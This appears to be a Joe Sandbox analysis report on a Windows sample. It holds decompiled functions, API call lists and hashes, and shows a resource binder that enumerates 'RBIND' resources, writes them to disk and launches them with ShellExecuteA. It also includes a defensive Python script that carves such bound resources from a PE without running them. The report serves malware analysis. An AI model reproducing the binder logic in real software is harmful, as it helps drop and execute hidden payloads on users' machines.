                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 003C1272
                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 003C12D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FileFind$ChangeCloseCreateDebugExecuteLoadLockNotificationOutputShellSizeofStringWrite_memset
                                                    • String ID: open
                                                    • API String ID: 1625157610-2758837156
                                                    • Opcode ID: 0195e4ad51d0e6ef55bac941477c75813296f9e4ab599db97fd4e9fca9531cf7
                                                    • Instruction ID: 0a708c069e9cf53ae1afd0146da513711147c3ad645af6da2dce2e3ce6964c8e
                                                    • Opcode Fuzzy Hash: 0195e4ad51d0e6ef55bac941477c75813296f9e4ab599db97fd4e9fca9531cf7
                                                    • Instruction Fuzzy Hash: D6618171D002289FDB22DB64CC59FEAB7B9FB49700F0545A9E909EB201D734AE84DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 100%
                                                    			E003C1330(struct HINSTANCE__* __eax, intOrPtr __edx) {
                                                    				_Unknown_base(*)()* _t2;
                                                    				struct HINSTANCE__* _t5;
                                                    				intOrPtr _t8;
                                                    
                                                    				_t8 = __edx;
                                                    				_t1 = __eax;
                                                    				if(__eax == 0) {
                                                    					_t1 = E003C2E90(__eax);
                                                    				}
                                                    				_t2 = GetProcAddress(_t1, "ShellExecuteA");
                                                    				 *0x3ce944 = _t2;
                                                    				if(__imp__ShellExecuteA == 0) {
                                                    					E003C2E90(0);
                                                    				}
                                                    				E003C1EB0(_t8, __imp__ShellExecuteA);
                                                    				EnumResourceNamesA(0, "RBIND", E003C10C0, 0);
                                                    				_t5 =  *0x3ce940; // 0x75390000
                                                    				return FreeLibrary(_t5);
                                                    			}

                                                    Statement addresses: 0x003c1330 to 0x003c1380

                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 003C1340
                                                    • EnumResourceNamesA.KERNEL32 ref: 003C136E
                                                    • FreeLibrary.KERNEL32(75390000,?,ShellExecuteA), ref: 003C137A
                                                      • Part of subcall function 003C2E90: _doexit.LIBCMT ref: 003C2E9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressEnumFreeLibraryNamesProcResource_doexit
                                                    • String ID: RBIND$ShellExecuteA
                                                    • API String ID: 2589694317-233069040
                                                    • Opcode ID: e9a1fc450daca6b1f262c00510bda159d3054edea3ae06f6fa768336918a4a7e
                                                    • Instruction ID: 9206909a015a442bda289eab86c9931197be8312e2778639f8987c719e81c1aa
                                                    • Opcode Fuzzy Hash: e9a1fc450daca6b1f262c00510bda159d3054edea3ae06f6fa768336918a4a7e
                                                    • Instruction Fuzzy Hash: F0E04F75A40310A6D623B7B09C0FF8B36AD7710706F06040AF505E90D2CBB5BC409B15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
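E003C1330 above calls EnumResourceNamesA(0, "RBIND", E003C10C0, 0), and the callback E003C10C0 writes each enumerated resource to a file with CreateFileA/WriteFile and then opens it with ShellExecuteA. That is a resource binder: the bound payloads sit in the binary's own resource directory under the custom type name "RBIND". The script below is an added triage example written for this report; it is not code from the sample or from Joe Sandbox. Using only the Python standard library it walks a PE's resource directory and returns every resource stored under a named type such as RBIND, so the bound files can be carved, hashed and scanned without executing the binder. The PE it builds for its own self-check is constructed inline and is not the analysed sample; the function and variable names are the example's own, and only the type name RBIND is taken from the decompiled code.

```python
import struct

RES_DIR_INDEX = 2      # IMAGE_DIRECTORY_ENTRY_RESOURCE
HIGH_BIT = 0x80000000  # IMAGE_RESOURCE_NAME_IS_STRING / IMAGE_RESOURCE_DATA_IS_DIRECTORY

def _sections(data, e_lfanew):
    """(VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) for each section."""
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    return [struct.unpack_from("<IIII", data, table + i * 40 + 8) for i in range(nsec)]

def _rva_to_off(sections, rva):
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is outside every section" % rva)

def _name(data, rsrc_off, field):
    if not field & HIGH_BIT:             # plain integer ID (e.g. RT_RCDATA = 10)
        return field
    p = rsrc_off + (field & 0x7FFFFFFF)  # IMAGE_RESOURCE_DIR_STRING_U: Length, UTF-16 chars
    n, = struct.unpack_from("<H", data, p)
    return data[p + 2:p + 2 + 2 * n].decode("utf-16-le")

def _walk(data, rsrc_off, sections, dir_off, path, out):
    base = rsrc_off + dir_off
    n_named, n_id = struct.unpack_from("<HH", data, base + 12)
    for i in range(n_named + n_id):
        name_f, off_f = struct.unpack_from("<II", data, base + 16 + 8 * i)
        key = path + (_name(data, rsrc_off, name_f),)
        if off_f & HIGH_BIT:   # subdirectory: type -> name -> language
            _walk(data, rsrc_off, sections, off_f & 0x7FFFFFFF, key, out)
        else:                  # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (an RVA), Size
            rva, size = struct.unpack_from("<II", data, rsrc_off + off_f)
            off = _rva_to_off(sections, rva)
            out.append((key, data[off:off + size]))

def list_resources(data):
    """[((type, name, lang), payload), ...] for every resource in a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT header")
    magic, = struct.unpack_from("<H", data, e_lfanew + 24)
    dd = e_lfanew + 24 + (96 if magic == 0x10B else 112) + 8 * RES_DIR_INDEX
    rsrc_rva, _ = struct.unpack_from("<II", data, dd)
    if rsrc_rva == 0:
        return []
    sections = _sections(data, e_lfanew)
    out = []
    _walk(data, _rva_to_off(sections, rsrc_rva), sections, 0, (), out)
    return out

def extract_bound_files(data, res_type="RBIND"):
    """{name: payload} for one resource type: the set EnumResourceNamesA would
    hand the binder's callback one entry at a time."""
    return {key[1]: blob for key, blob in list_resources(data) if key[0] == res_type}

def build_sample_pe():
    """Constructed test input, not the analysed sample: a minimal PE32 whose only
    section (.rsrc) holds two RBIND resources and one RT_RCDATA (type 10) resource."""
    rsrc_rva, rsrc_raw = 0x2000, 0x400
    p1, p2, p3 = b"MZ-first-bound-file", b"second-bound-file", b"rcdata-config"
    def d(named, ids): return struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)  # directory hdr
    def e(name, off, sub): return struct.pack("<II", name, off | (HIGH_BIT if sub else 0))
    def de(off, size): return struct.pack("<IIII", rsrc_rva + off, size, 0, 0)  # data entry
    rsrc = (d(1, 1) + e(HIGH_BIT | 0xD0, 0x20, 1) + e(10, 0x40, 1)  # 0x00 root: "RBIND", RT_RCDATA
            + d(0, 2) + e(1, 0x58, 1) + e(2, 0x70, 1)               # 0x20 RBIND -> names 1, 2
            + d(0, 1) + e(100, 0x88, 1)                             # 0x40 RCDATA -> name 100
            + d(0, 1) + e(0x409, 0xA0, 0)                           # 0x58 RBIND/1 -> lang 0x409
            + d(0, 1) + e(0x409, 0xB0, 0)                           # 0x70 RBIND/2 -> lang 0x409
            + d(0, 1) + e(0x409, 0xC0, 0)                           # 0x88 RCDATA/100 -> lang
            + de(0xE0, len(p1)) + de(0x100, len(p2)) + de(0x120, len(p3))  # 0xA0, 0xB0, 0xC0
            + struct.pack("<H", 5) + "RBIND".encode("utf-16-le"))   # 0xD0 type-name string
    rsrc = rsrc.ljust(0xE0, b"\0") + p1
    rsrc = rsrc.ljust(0x100, b"\0") + p2
    rsrc = rsrc.ljust(0x120, b"\0") + p3
    opt = bytearray(struct.pack("<H", 0x10B).ljust(96 + 16 * 8, b"\0"))  # PE32 magic + 16 dirs
    struct.pack_into("<II", opt, 96 + 8 * RES_DIR_INDEX, rsrc_rva, len(rsrc))
    nt = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102) + bytes(opt)
    sec = (b".rsrc".ljust(8, b"\0")
           + struct.pack("<IIII", len(rsrc), rsrc_rva, len(rsrc), rsrc_raw) + bytes(16))
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    return (dos + nt + sec).ljust(rsrc_raw, b"\0") + rsrc

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for name, payload in extract_bound_files(blob).items():
        print("RBIND/%s: %d bytes, starts with %r" % (name, len(payload), payload[:8]))
```

Saved as, for instance, carve_rbind.py (a hypothetical file name) and run with a path argument, it carves a real sample; without one it carves the constructed PE. Carving recovers what the callback would write to disk before its ShellExecuteA branch runs; a resource that is itself packed or encrypted still needs the next-stage unpacking, and a binary without an RBIND type simply yields an empty dict.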

                                                    Control-flow Graph

                                                    • Basic blocks: 3c2c38-3c2c49 (call 3c2c0d, then ExitProcess)
                                                    C-Code - Quality: 100%
                                                    			E003C2C38(int _a4) {
                                                    
                                                    				E003C2C0D(_a4);
                                                    				ExitProcess(_a4);
                                                    			}

                                                    Statement addresses: 0x003c2c40 to 0x003c2c49

                                                    APIs
                                                    • ___crtCorExitProcess.LIBCMT ref: 003C2C40
                                                      • Part of subcall function 003C2C0D: GetModuleHandleW.KERNEL32(mscoree.dll,?,003C2C45,00000000,?,003C3432,000000FF,0000001E,00000001,00000000,00000000,?,003C484E,00000000,00000001,00000000), ref: 003C2C17
                                                      • Part of subcall function 003C2C0D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003C2C27
                                                    • ExitProcess.KERNEL32 ref: 003C2C49
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                    • String ID:
                                                    • API String ID: 2427264223-0
                                                    • Opcode ID: 3e02ecbc99dbfde8a6eb8360f4885a3eb45d8fa269a2488a29c53814a93dc2a0
                                                    • Instruction ID: 81dd9025c17e1ed73fb69f64a4fe1f30d6462c9b21e568acb8aa600cdc59885d
                                                    • Opcode Fuzzy Hash: 3e02ecbc99dbfde8a6eb8360f4885a3eb45d8fa269a2488a29c53814a93dc2a0
                                                    • Instruction Fuzzy Hash: 48B09231000148FBCB022F12DC0EE4E3F2AEB803A0B118025F81889031DF72AD92DBC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Basic blocks: 3c65cb-3c664c; RtlAllocateHeap in 3c6605-3c6616; subcalls 3c4264 (from 3c65e3-3c65f1) and 3c3d86 (from 3c6621-3c662a); the edge 3c6621 -> 3c65fe re-enters the allocation loop
                                                    C-Code - Quality: 86%
                                                    			E003C65CB(signed int _a4, signed int _a8, long _a12) {
                                                    				void* _t10;
                                                    				long _t11;
                                                    				long _t12;
                                                    				signed int _t13;
                                                    				signed int _t17;
                                                    				long _t19;
                                                    				long _t24;
                                                    
                                                    				_t17 = _a4;
                                                    				if(_t17 == 0) {
                                                    					L3:
                                                    					_t24 = _t17 * _a8;
                                                    					__eflags = _t24;
                                                    					if(_t24 == 0) {
                                                    						_t24 = _t24 + 1;
                                                    						__eflags = _t24;
                                                    					}
                                                    					goto L5;
                                                    					L6:
                                                    					_t10 = RtlAllocateHeap( *0x3ce8c0, 8, _t24); // executed
                                                    					__eflags = 0;
                                                    					if(0 == 0) {
                                                    						goto L7;
                                                    					}
                                                    					L14:
                                                    					return _t10;
                                                    					goto L15;
                                                    					L7:
                                                    					__eflags =  *0x3ce8c4;
                                                    					if( *0x3ce8c4 == 0) {
                                                    						_t19 = _a12;
                                                    						__eflags = _t19;
                                                    						if(_t19 != 0) {
                                                    							 *_t19 = 0xc;
                                                    						}
                                                    					} else {
                                                    						_t11 = E003C3D86(_t10, _t24);
                                                    						__eflags = _t11;
                                                    						if(_t11 != 0) {
                                                    							L5:
                                                    							_t10 = 0;
                                                    							__eflags = _t24 - 0xffffffe0;
                                                    							if(_t24 > 0xffffffe0) {
                                                    								goto L7;
                                                    							} else {
                                                    								goto L6;
                                                    							}
                                                    						} else {
                                                    							_t12 = _a12;
                                                    							__eflags = _t12;
                                                    							if(_t12 != 0) {
                                                    								 *_t12 = 0xc;
                                                    							}
                                                    							_t10 = 0;
                                                    						}
                                                    					}
                                                    					goto L14;
                                                    				} else {
                                                    					_t13 = 0xffffffe0;
                                                    					_t27 = _t13 / _t17 - _a8;
                                                    					if(_t13 / _t17 >= _a8) {
                                                    						goto L3;
                                                    					} else {
                                                    						 *((intOrPtr*)(E003C4264(_t27))) = 0xc;
                                                    						return 0;
                                                    					}
                                                    				}
                                                    				L15:
                                                    			}

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,003C4898,00000000,?,00000000,00000000,00000000,?,003C3F10,00000001,00000214), ref: 003C660E
                                                      • Part of subcall function 003C4264: __getptd_noexit.LIBCMT ref: 003C4264
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 328603210-0
                                                    • Opcode ID: 089b02ea6b69de995351f61f69e4dcf806ab88e99b40a8c8071123bc6bbc7011
                                                    • Instruction ID: a65a6c995e3270accd025d4ca2c295d04659c690b0c6103e39768b887359842e
                                                    • Opcode Fuzzy Hash: 089b02ea6b69de995351f61f69e4dcf806ab88e99b40a8c8071123bc6bbc7011
                                                    • Instruction Fuzzy Hash: DD01D431301221ABEB279F65DC16F66339CAB82760F12862DE816CB1D4D730DC11C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow graph of E003C2E90 (rendered as an image in the original report; executed/not-executed legend and basic-block edge listing omitted)
                                                    C-Code - Quality: 25%
                                                    			E003C2E90(intOrPtr _a4) {
                                                    				void* __ebp;
                                                    				void* _t2;
                                                    				void* _t3;
                                                    				void* _t4;
                                                    				void* _t5;
                                                    				void* _t8;
                                                    
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(_a4);
                                                    				_t2 = E003C2D50(_t3, _t4, _t5, _t8); // executed
                                                    				return _t2;
                                                    			}

                                                    APIs
                                                    • _doexit.LIBCMT ref: 003C2E9C
                                                      • Part of subcall function 003C2D50: __lock.LIBCMT ref: 003C2D5E
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(003CB5D8,00000020,003C2EB7,00000000,00000001,00000000,?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2D9A
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DAB
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(-00000004,?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DD1
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DE4
                                                      • Part of subcall function 003C2D50: DecodePointer.KERNEL32(?,003C2EF7,000000FF,?,003C3919,00000011,00000000,?,003C3E7B,0000000D), ref: 003C2DEE
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DecodePointer$__lock_doexit
                                                    • String ID:
                                                    • API String ID: 3343572566-0
                                                    • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                    • Instruction ID: 1f5d33cf467edca3b1e1ead75d56312ddb583d564390acb61ad4ce2e552faa89
                                                    • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                    • Instruction Fuzzy Hash: CDB0927258020837DA222542AC07F063A0987D0B64E250020BA1D1D1A2A9A2A9628189
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow graph of the RtlEncodePointer stub at 003C3DAE (rendered as an image in the original report; executed/not-executed legend omitted)
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000,003C6286,003CE188,00000314,00000000,?,?,?,?,?,003C4792,003CE188,Microsoft Visual C++ Runtime Library,00012010), ref: 003C3DB0
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: 0969a2b6850b39b9726fb6a5ff7203538ff7ff049684342df25b80eaee678dca
                                                    • Instruction ID: 97100d638f56b15023595802b018edfe58893152650feb9c87acce5907fa4a8f
                                                    • Opcode Fuzzy Hash: 0969a2b6850b39b9726fb6a5ff7203538ff7ff049684342df25b80eaee678dca
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E003C2701(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                    				intOrPtr _v0;
                                                    				void* _v804;
                                                    				intOrPtr _v808;
                                                    				intOrPtr _v812;
                                                    				intOrPtr _t6;
                                                    				intOrPtr _t11;
                                                    				intOrPtr _t12;
                                                    				intOrPtr _t13;
                                                    				long _t17;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t22;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t27;
                                                    				intOrPtr* _t31;
                                                    				void* _t34;
                                                    
                                                    				_t27 = __esi;
                                                    				_t26 = __edi;
                                                    				_t25 = __edx;
                                                    				_t22 = __ecx;
                                                    				_t21 = __ebx;
                                                    				_t6 = __eax;
                                                    				_t34 = _t22 -  *0x3cd07c; // 0xbd8f316a
                                                    				if(_t34 == 0) {
                                                    					asm("repe ret");
                                                    				}
                                                    				 *0x3cddd8 = _t6;
                                                    				 *0x3cddd4 = _t22;
                                                    				 *0x3cddd0 = _t25;
                                                    				 *0x3cddcc = _t21;
                                                    				 *0x3cddc8 = _t27;
                                                    				 *0x3cddc4 = _t26;
                                                    				 *0x3cddf0 = ss;
                                                    				 *0x3cdde4 = cs;
                                                    				 *0x3cddc0 = ds;
                                                    				 *0x3cddbc = es;
                                                    				 *0x3cddb8 = fs;
                                                    				 *0x3cddb4 = gs;
                                                    				asm("pushfd");
                                                    				_pop( *0x3cdde8);
                                                    				 *0x3cdddc =  *_t31;
                                                    				 *0x3cdde0 = _v0;
                                                    				 *0x3cddec =  &_a4;
                                                    				 *0x3cdd28 = 0x10001;
                                                    				_t11 =  *0x3cdde0; // 0x0
                                                    				 *0x3cdcdc = _t11;
                                                    				 *0x3cdcd0 = 0xc0000409;
                                                    				 *0x3cdcd4 = 1;
                                                    				_t12 =  *0x3cd07c; // 0xbd8f316a
                                                    				_v812 = _t12;
                                                    				_t13 =  *0x3cd080; // 0x4270ce95
                                                    				_v808 = _t13;
                                                    				 *0x3cdd20 = IsDebuggerPresent();
                                                    				_push(1);
                                                    				E003C520E(_t14);
                                                    				SetUnhandledExceptionFilter(0);
                                                    				_t17 = UnhandledExceptionFilter(0x3c922c);
                                                    				if( *0x3cdd20 == 0) {
                                                    					_push(1);
                                                    					E003C520E(_t17);
                                                    				}
                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                    			}

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 003C3359
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003C336E
                                                    • UnhandledExceptionFilter.KERNEL32(003C922C), ref: 003C3379
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 003C3395
                                                    • TerminateProcess.KERNEL32(00000000), ref: 003C339C
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: c99f5393faed32ded96af4c5ae27a823219496d521fe3c85759ce48085a41c92
                                                    • Instruction ID: 3cd25dfe3c087956af7cf297038cff0ee58fa76fac50afbb45ef06fe99c2ed29
                                                    • Opcode Fuzzy Hash: c99f5393faed32ded96af4c5ae27a823219496d521fe3c85759ce48085a41c92
                                                    • Instruction Fuzzy Hash: 6A2178B5801214DBDB02DF69FD49E947BACBF88315F11446AF90ACB260EBB0B981CB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E003C4991() {
                                                    
                                                    				SetUnhandledExceptionFilter(E003C494F);
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000494F), ref: 003C4996
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: b536a60b4fb036bc647033f3766241b88e53c656d5970c71b4dd1fa0d9e3759c
                                                    • Instruction ID: 403a778b478daa3bba94374c5809eed2ea29053dd32d6befde1f017c52ae028f
                                                    • Opcode Fuzzy Hash: b536a60b4fb036bc647033f3766241b88e53c656d5970c71b4dd1fa0d9e3759c
                                                    • Instruction Fuzzy Hash: 5F9002B02511614646431774AC1EF8625A86A48722B422495E816C5058DB6054449711
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 62%
                                                    			E003C40A7(void* __ebx) {
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				_Unknown_base(*)()* _t7;
                                                    				long _t10;
                                                    				void* _t11;
                                                    				int _t12;
                                                    				void* _t14;
                                                    				void* _t15;
                                                    				void* _t16;
                                                    				void* _t18;
                                                    				intOrPtr _t21;
                                                    				long _t26;
                                                    				void* _t30;
                                                    				struct HINSTANCE__* _t35;
                                                    				intOrPtr* _t36;
                                                    				void* _t39;
                                                    				intOrPtr* _t41;
                                                    				void* _t42;
                                                    
                                                    				_t30 = __ebx;
                                                    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                    				if(_t35 != 0) {
                                                    					 *0x3ce178 = GetProcAddress(_t35, "FlsAlloc");
                                                    					 *0x3ce17c = GetProcAddress(_t35, "FlsGetValue");
                                                    					 *0x3ce180 = GetProcAddress(_t35, "FlsSetValue");
                                                    					_t7 = GetProcAddress(_t35, "FlsFree");
                                                    					__eflags =  *0x3ce178;
                                                    					_t39 = TlsSetValue;
                                                    					 *0x3ce184 = _t7;
                                                    					if( *0x3ce178 == 0) {
                                                    						L6:
                                                    						 *0x3ce17c = TlsGetValue;
                                                    						 *0x3ce178 = E003C3DB7;
                                                    						 *0x3ce180 = _t39;
                                                    						 *0x3ce184 = TlsFree;
                                                    					} else {
                                                    						__eflags =  *0x3ce17c;
                                                    						if( *0x3ce17c == 0) {
                                                    							goto L6;
                                                    						} else {
                                                    							__eflags =  *0x3ce180;
                                                    							if( *0x3ce180 == 0) {
                                                    								goto L6;
                                                    							} else {
                                                    								__eflags = _t7;
                                                    								if(_t7 == 0) {
                                                    									goto L6;
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					_t10 = TlsAlloc();
                                                    					 *0x3cd1b4 = _t10;
                                                    					__eflags = _t10 - 0xffffffff;
                                                    					if(_t10 == 0xffffffff) {
                                                    						L15:
                                                    						_t11 = 0;
                                                    						__eflags = 0;
                                                    					} else {
                                                    						_t12 = TlsSetValue(_t10,  *0x3ce17c);
                                                    						__eflags = _t12;
                                                    						if(_t12 == 0) {
                                                    							goto L15;
                                                    						} else {
                                                    							E003C2C62();
                                                    							_t41 = __imp__EncodePointer;
                                                    							_t14 =  *_t41( *0x3ce178);
                                                    							 *0x3ce178 = _t14;
                                                    							_t15 =  *_t41( *0x3ce17c);
                                                    							 *0x3ce17c = _t15;
                                                    							_t16 =  *_t41( *0x3ce180);
                                                    							 *0x3ce180 = _t16;
                                                    							 *0x3ce184 =  *_t41( *0x3ce184);
                                                    							_t18 = E003C3778();
                                                    							__eflags = _t18;
                                                    							if(_t18 == 0) {
                                                    								L14:
                                                    								E003C3DF4();
                                                    								goto L15;
                                                    							} else {
                                                    								_t36 = __imp__DecodePointer;
                                                    								_t21 =  *((intOrPtr*)( *_t36()))( *0x3ce178, E003C3F78);
                                                    								 *0x3cd1b0 = _t21;
                                                    								__eflags = _t21 - 0xffffffff;
                                                    								if(_t21 == 0xffffffff) {
                                                    									goto L14;
                                                    								} else {
                                                    									_t42 = E003C4882(1, 0x214);
                                                    									__eflags = _t42;
                                                    									if(_t42 == 0) {
                                                    										goto L14;
                                                    									} else {
                                                    										__eflags =  *((intOrPtr*)( *_t36()))( *0x3ce180,  *0x3cd1b0, _t42);
                                                    										if(__eflags == 0) {
                                                    											goto L14;
                                                    										} else {
                                                    											_push(0);
                                                    											_push(_t42);
                                                    											E003C3E31(_t30, _t36, _t42, __eflags);
                                                    											_t26 = GetCurrentThreadId();
                                                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                    											 *_t42 = _t26;
                                                    											_t11 = 1;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					return _t11;
                                                    				} else {
                                                    					E003C3DF4();
                                                    					return 0;
                                                    				}
                                                    			}

                                                    Instruction addresses for the listing above (the side-by-side mapping to the C-Code
                                                    lines did not survive extraction; 0x00000000 marks goto lines):
                                                    0x003c40a7 0x003c40b5 0x003c40b9 0x003c40d9 0x003c40e6 0x003c40f3 0x003c40f8 0x003c40fa 0x003c4101 0x003c4107
                                                    0x003c410c 0x003c4124 0x003c4129 0x003c4133 0x003c413d 0x003c4143 0x003c410e 0x003c410e 0x003c4115 0x00000000
                                                    0x003c4117 0x003c4117 0x003c411e 0x00000000 0x003c4120 0x003c4120 0x003c4122 0x00000000 0x00000000 0x003c4122
                                                    0x003c411e 0x003c4115 0x003c4148 0x003c414e 0x003c4153 0x003c4156 0x003c421d 0x003c421d 0x003c421d 0x003c415c
                                                    0x003c4163 0x003c4165 0x003c4167 0x00000000 0x003c416d 0x003c416d 0x003c4178 0x003c417e 0x003c4186 0x003c418b
                                                    0x003c4193 0x003c4198 0x003c41a0 0x003c41a7 0x003c41ac 0x003c41b1 0x003c41b3 0x003c4218 0x003c4218 0x00000000
                                                    0x003c41b5 0x003c41b5 0x003c41c8 0x003c41ca 0x003c41cf 0x003c41d2 0x00000000 0x003c41d4 0x003c41e0 0x003c41e4
                                                    0x003c41e6 0x00000000 0x003c41e8 0x003c41f9 0x003c41fb 0x00000000 0x003c41fd 0x003c41fd 0x003c41ff 0x003c4200
                                                    0x003c4207 0x003c420d 0x003c4211 0x003c4215 0x003c4215 0x003c41fb 0x003c41e6 0x003c41d2 0x003c41b3 0x003c4167
                                                    0x003c4221 0x003c40bb 0x003c40bb 0x003c40c3 0x003c40c3

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,003C3165), ref: 003C40AF
                                                    • __mtterm.LIBCMT ref: 003C40BB
                                                      • Part of subcall function 003C3DF4: DecodePointer.KERNEL32(00000005,003C421D,?,003C3165), ref: 003C3E05
